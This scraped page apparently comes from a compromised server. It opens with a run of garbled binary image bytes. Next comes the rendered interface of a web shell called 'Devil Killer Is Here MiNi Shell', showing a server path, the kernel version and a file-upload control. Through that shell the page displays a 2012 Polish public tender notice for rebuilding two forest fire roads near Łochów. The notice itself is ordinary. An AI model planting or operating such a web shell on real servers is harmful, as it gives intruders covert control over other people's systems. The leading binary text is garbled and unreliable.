JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120517/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120517/158734-N-2012.html

<p class="kh_header"><b>Łochów: roboty budowlane obejmujące przebudowę dróg w leśnictwie Wielgie: 
Część nr 1 - utwardzenie nawierzchni drogi leśnej wewnętrznej pożarowej nr 42 związanej z produkcją leśną o długości 1+655 km w oddziałach nr: 177, 176, 175, 174, 169;działki nr 221, 220, 215, 219, 218,213;
Część nr 2 - utwardzenie nawierzchni drogi leśnej wewnętrznej pożarowej nr 22 związanej z produkcją leśną o długości 2+240 km w oddziałach nr: 119, 118, 129, 139; działki nr 673, 674, 678,683.</b><br>
<b>Numer ogłoszenia: 158734 - 2012; data zamieszczenia: 17.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Łochów , ul. Wyszkowska 28, 07-130 Łochów, woj. mazowieckie, tel. 025 6751124, 6752078, faks 025 6752124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_warszawa/nadl_lochow/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> roboty budowlane obejmujące przebudowę dróg w leśnictwie Wielgie: 
Część nr 1 - utwardzenie nawierzchni drogi leśnej wewnętrznej pożarowej nr 42 związanej z produkcją leśną o długości 1+655 km w oddziałach nr: 177, 176, 175, 174, 169;działki nr 221, 220, 215, 219, 218,213;
Część nr 2 - utwardzenie nawierzchni drogi leśnej wewnętrznej pożarowej nr 22 związanej z produkcją leśną o długości 2+240 km w oddziałach nr: 119, 118, 129, 139; działki nr 673, 674, 678,683..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wykonanie robót budowlanych polegających na: utwardzenie nawierzchni drogi leśnej wewnętrznej pożarowej nr 42 związanej z  produkcją leśną o długości 1+655 km w oddziałach nr: 177, 176, 175, 174, 169; działki nr 221, 220, 215, 219, 218,213 oraz utwardzenie nawierzchni drogi leśnej wewnętrznej pożarowej nr 22 związanej z produkcją leśną o długości 2+240 km w oddziałach nr: 119, 118, 129, 139 działki nr 673, 674, 678,683.
Zestawienie podstawowych parametrów drogi leśnej wewnętrznej pożarowej nr 42 związanej z  produkcją leśną o długości 1+655 km: 
- długość całkowita drogi - 1655.0 m , powierzchnia z mijankami i zjazdami =  303,75+1270,0+8083.0= 9656.75 m2,
- od km 0+000 do km 1+185 szer.  nawierzchni z poboczami - 5.0 m,
- od km 1+185 do km 1+655 szer.  nawierzchni z poboczami - 4.5 m,
- od km 0+000 do km 1+368 , nawierzchnia z kamienia łamanego 0/31.5 mm gr 15 cm po zagęszczeniu na warstwie odcinającej z pospółki  żwirowej  gr 15 cm po zagęszczeniu,
- od km 1+368 do km 1+655 nasyp poszerzony do 5.4 m , nawierzchnia z kamienia łamanego 0/31.5 mm gr 15 cm po zagęszczeniu , na geokracie gr 15 cm wypełnionej pospółką  żwirową odciętej od podłoża geowłókniną,  
- od km 0+000 do km 0+120 nasyp z piasku o zmiennej grubości  od 0 do 1.2m,  
- dł.  rowów istniejących  1423.0 m, 
- dł. rowów projektowanych  - 1247.0 m, 
- przepust dn. 400 mm z rur strukturalnych w km 0+723 dł. 6.0 m i w  km 1+460 dł. 6.0 m, w km 1+540 istniejący przepust na którym należy wykonać ścianki czołowe, 
- mijanka  lewa szer. 7.5 m z poboczami  w km 0+445 i 0+950, mijanka prawa w km 1+362.
Zestawienie podstawowych parametrów drogi leśnej wewnętrznej pożarowej nr 22 związanej z produkcją leśną o długości 2+240 km: 
- długość całkowita drogi - 2240.0 m , powierzchnia z mijankami , zjazdami i poszerzeniami na łukach  =  526.5 +876.8 + 136.52 + 11200 = 12739.82 m2,
- od km 0+000 do km 2+240  szer.  nawierzchni z poboczami - 5.0 m,
- od km 0+000 do km 2+240 , nawierzchnia z kamienia łamanego 0/31.5 mm gr 15 cm po zagęszczeniu na warstwie odcinającej z pospółki  żwirowej  gr 15 cm po zagęszczeniu,
- od km 0+430 do km 0+512 i od km 0+728 do 1+375  geokrata gr 15 cm wypełniona kruszywem i warstwa separacyjna z geowłókniny  - 2754.88 m2,   
- od km 1+595do km 1+658  droga w przekopie,  
- od km 1+658 do km 2+127  droga w nasypie,   
- dł. rowów istniejących  1011.00 m,
- dł. rowów projektowanych  - 340.0 m, 
- mijanki  lewa szer. 7.5 m z poboczami  w km 0+300 , 0+677, km 1+505,
- mijanka prawa szer. 7.5m z poboczami  w km 1+100, km 1+924. 
Szczegółowy opis przedmiotu zamówienia obejmujący, ustalony przez Zamawiającego z należytą starannością, przewidywany do wykonania zakres robót zawiera Rozdział II SIWZ, w tym Dokumentacja projektowa (Załącznik nr 1 do OPZ), Specyfikacje techniczne wykonania i odbioru robót budowlanych (Załącznik nr 2 do OPZ) oraz Przedmiary robót (Załącznik nr 3 do OPZ).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego, liczonych odrębnie dla każdej części, na które Zamawiający dopuścił składanie ofert częściowych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7, 45.23.32.20-7, 45.23.31.42-6, 45.10.00.00-8, 45.23.11.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca składający oferty częściowe jest zobowiązany do wniesienia wadium: 
1) dla części nr 1 - w wysokości 11 tys. PLN (słownie złotych: jedenaście tysięcy),
2) dla części nr 2 - w wysokości 16 tys. PLN (słownie złotych: szesnaście tysięcy).
2.Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku spośród następujących form, w zależności od wyboru Wykonawcy:
1)	pieniądzu, przelewem na rachunek bankowy Zamawiającego w PKO BP Węgrów na numer konta 83102044760000890200173740;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.  U. z 2007 r. Nr 42, poz. 275).
3.Wadium musi obejmować cały okres związania ofertą, tj. począwszy od dnia, w którym upływa termin składania ofert do co najmniej ostatniego dnia związania ofertą włącznie.
4.Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
5.W przypadku, gdy wadium wnoszone jest w innej formie niż pieniądz, Wykonawca powinien oryginał gwarancji lub poręczenia złożyć wraz z ofertą w osobnej wewnętrznej kopercie, natomiast kserokopię dokumentu wadialnego dołączyć do oferty.
6.W razie wnoszenia wadium w formie pieniężnej w tytule przelewu należy umieścić następującą informację: Postępowanie na wykonanie robót budowlanych obejmujących przebudowę dróg w leśnictwie Wielgie:
Część nr 1 - utwardzenie nawierzchni drogi leśnej wewnętrznej pożarowej nr 42 związanej z produkcją leśną o długości 1+655 km w oddziałach nr: 177, 176, 175, 174, 169;działki nr 221, 220, 215, 219, 218,213;
Część nr 2 - utwardzenie nawierzchni drogi leśnej wewnętrznej pożarowej nr 22 związanej z produkcją leśną o długości 2+240 km w oddziałach nr: 119, 118, 129, 139 działki nr 673, 674, 678,683. - nr postępowania  S - 2710 - 04_12.
10.7.	Wykonawca, który nie wniesie wadium w wysokości określonej w pkt 10.1., w formie lub formach, o których mowa w pkt 2., zostanie wykluczony z postępowania.
8.Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 13.
9.Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
10.Zamawiający zwróci niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.Zamawiający żądać będzie ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 8., jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca winien wnieść wadium w terminie określonym przez Zamawiającego.
12.Jeżeli wadium wniesiono w pieniądzu Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
13.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie w trybie art. 26 ust. 3 ustawy Pzp, nie złoży wymaganych oświadczeń lub dokumentów, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
14.Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy:
1)	odmówi podpisania umowy w sprawie niniejszego zamówienia na warunkach określonych w ofercie;
2)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykonali z należytą starannością w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
1) dla części nr 1 - co najmniej jedną inwestycję obejmującą  przebudowę drogi , o długości co najmniej 1 km o wartości co najmniej 100 tys. PLN,
2) dla części nr 2 - co najmniej jedną inwestycję obejmującą  przebudowę drogi, o długości co najmniej 1 km o wartości co najmniej 100 tys. PLN.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują (lub będą dysponować) co najmniej następującymi maszynami: 
1) Walec drogowy wibracyjny   o następujących parametrach: 10 tonowy co najmniej 1 sztukę na okres realizacji umowy;
2) Równiarka o następujących parametrach: napęd 6x6, lemiesz przedni, lemiesz środkowy o szerokości 3660 mm co najmniej 1 sztukę  na okres realizacji umowy;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują (lub będą dysponować) co najmniej: 
1) Jedną osobą z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności drogowej, bez ograniczeń;
	Dopuszcza się wykazanie spełniania powyższych wymagań poprzez przedstawienie większej lub mniejszej ilości osób, pod warunkiem, że wszystkie wskazane osoby łącznie posiadają wszystkie wymagane przez Zamawiającego uprawnienia budowlane.
Przez uprawnienia budowlane rozumie się uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, wydane na podstawie ustawy Prawo budowlane (j.t. Dz.U. z 2010 r. Nr 243, poz. 1623, ze zm.) oraz rozporządzenia Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2006 r. Nr 83, poz. 578, ze zm.) lub odpowiadające im inne ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów.
W przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą oni spełniać wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63, poz. 394).
Podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie stanowi wpis, w drodze decyzji, do centralnego rejestru osób posiadających uprawnienia budowlane prowadzonego przez Głównego Inspektora Nadzoru Budowlanego, oraz - zgodnie z ustawą o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001 r. Nr 5, poz. 42, ze zm.) - wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają: 
1) ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 100 tys. PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wykonawca biorący udział w postępowaniu winien złożyć ofertę, której zawartość stanowić będzie Oferta sporządzona zgodnie z treścią formularza zamieszczonego w Rozdziale IV SIWZ oraz Zestawienie wartości kosztorysowych, sporządzone zgodnie z treścią formularza znajdującego się w Załączniku nr 1 do Oferty, a także Kosztorys ofertowy lub kosztorysy ofertowe (dotyczące tych Części, na które wykonawca składa ofertę), sporządzone na podstawie Przedmiarów robót zgodnie z treścią Załącznika nr 1 do Zestawienia wartości kosztorysowych.
2) Oświadczenie o spełnianiu warunków udziału w postępowaniu (formularz Oświadczenia znajduje się w Rozdziale III SIWZ).
3)Wadium.
1. Jeżeli wadium jest wnoszone w formie pieniężnej, wówczas należy je wpłacić na rachunek bankowy wskazany przez Zamawiającego, natomiast wraz z ofertą należy złożyć potwierdzenie dokonania przelewu. 
2. W przypadku, gdy wadium wnoszone jest w innej formie niż pieniądz (tzn. w formie gwarancji lub poręczenia), wówczas wraz z ofertą należy złożyć oryginał dokumentu wadialnego lub oryginały dokumentów wadialnych wystawione odrębnie dla poszczególnych części zamówienia, na które Wykonawca składa ofertę - w osobnej wewnętrznej kopercie, natomiast kserokopie dokumentu wadialnego / dokumentów wadialnych poświadczone przez Wykonawcę za zgodność z oryginałem - należy dołączyć do oferty. 
Ewentualne niedostosowanie się do wymogu dotyczącego wadiów dla zamówień częściowych i złożenie wadium w postaci jednego dokumentu wadialnego odnoszącego się do wszystkich części zamówienia, na które Wykonawca złoży ofertę, nie będzie skutkować wykluczeniem Wykonawcy z postępowania, jednak wszelkie możliwe negatywne tego skutki będą obciążać Wykonawcę (np. brak możliwości wywiązania się przez Zamawiającego z obowiązku niezwłocznego zwrotu wadium, w odniesieniu do części zamówienia, w których oferta Wykonawcy nie zostanie uznana za najkorzystniejszą, zgodnie z art. 46 ust. 1 ustawy Pzp).
4) Pełnomocnictwo do podpisania oferty, względnie do podpisywania innych dokumentów składanych wraz z ofertą, o ile prawo to nie wynika z innych dokumentów lub pełnomocnictw złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony.
5) W przypadku, gdyby pełnomocnictwa, o którym mowa w pkt 4, udzielała osoba inna niż uprawniona do reprezentowania podmiotu z mocy prawa lub umowy spółki, należy dołączyć do oferty również pełnomocnictwo do dokonania tej czynności.
6) Pełnomocnictwo do reprezentowania Wykonawców w postępowaniu albo reprezentowania Wykonawców w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
